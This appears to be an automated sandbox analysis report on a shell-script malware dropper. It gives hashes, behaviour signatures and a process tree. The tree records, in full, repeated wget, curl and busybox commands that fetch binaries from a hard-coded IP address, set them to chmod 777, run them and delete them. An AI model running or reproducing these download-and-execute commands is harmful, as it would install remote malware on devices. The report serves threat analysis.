Analysis
-
max time kernel
79s -
max time network
81s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
-
Size
10KB
-
MD5
d02d2cc45f453ae469915bf5bfcf48ec
-
SHA1
5db9569732492cb7f0762973db3950e0cbbff9d8
-
SHA256
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1
-
SHA512
e6f62639d7a9ed67f76e803004282c82162e299db70a632e144b81ac07192254c5e424f5bc32b5267f608d7b11c7692c55098a8f3d0dd4fe69efa61d22430f3b
-
SSDEEP
96:rb5p07Lo4jxniybeVFX5Xe4WVykrlkz9Cb5O:rb5y7Lo4jp+Fwb5O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 941 chmod 923 chmod 857 chmod 899 chmod 959 chmod 792 chmod 869 chmod 929 chmod 977 chmod 822 chmod 887 chmod 893 chmod 947 chmod 965 chmod 743 chmod 806 chmod 971 chmod 731 chmod 842 chmod 863 chmod 917 chmod 935 chmod 875 chmod 881 chmod 905 chmod 800 chmod 953 chmod 911 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd 733 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y 744 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 793 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D 801 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 807 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy 823 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH 843 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 858 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx 864 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 870 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB 876 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr 882 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr /tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK 888 gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK /tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH 894 nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 900 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 906 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D 912 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 918 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy 924 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH 930 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 936 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx 942 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx /tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH 948 nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB 954 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr 960 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr /tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK 966 gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y 972 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd 978 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 curl File opened for modification /tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK curl File opened for modification /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D curl File opened for modification /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 curl File opened for modification /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y curl File opened for modification /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH curl File opened for modification /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB curl File opened for modification /tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH curl File opened for modification /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx curl File opened for modification /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 curl File opened for modification /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH curl File opened for modification /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y curl File opened for modification /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd curl File opened for modification /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr curl File opened for modification /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 curl File opened for modification /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd curl File opened for modification /tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH curl File opened for modification /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 curl File opened for modification /tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK curl File opened for modification /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy curl File opened for modification /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 curl File opened for modification /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy curl File opened for modification /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx curl File opened for modification /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB curl File opened for modification /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 curl File opened for modification /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr curl File opened for modification /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D curl File opened for modification /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 curl
Processes
-
/tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh/tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:729
-
-
/bin/chmodchmod 777 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd./Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:742
-
-
/bin/chmodchmod 777 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y./vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:788
-
-
/bin/chmodchmod 777 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0./1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:799
-
-
/bin/chmodchmod 777 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D./U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:805
-
-
/bin/chmodchmod 777 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2./l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:819
-
-
/bin/chmodchmod 777 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy./Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:839
-
-
/bin/chmodchmod 777 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH./dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:853
-
-
/bin/chmodchmod 777 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8./tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:862
-
-
/bin/chmodchmod 777 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx./EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:868
-
-
/bin/chmodchmod 777 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6./RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:874
-
-
/bin/chmodchmod 777 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB./s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:880
-
-
/bin/chmodchmod 777 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr./ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:886
-
-
/bin/chmodchmod 777 gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK./gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:892
-
-
/bin/chmodchmod 777 nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH./nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:898
-
-
/bin/chmodchmod 777 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2./l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:904
-
-
/bin/chmodchmod 777 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0./1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:910
-
-
/bin/chmodchmod 777 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D./U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:916
-
-
/bin/chmodchmod 777 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6./RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:922
-
-
/bin/chmodchmod 777 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy./Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:928
-
-
/bin/chmodchmod 777 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH./dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:934
-
-
/bin/chmodchmod 777 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8./tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:937
-
-
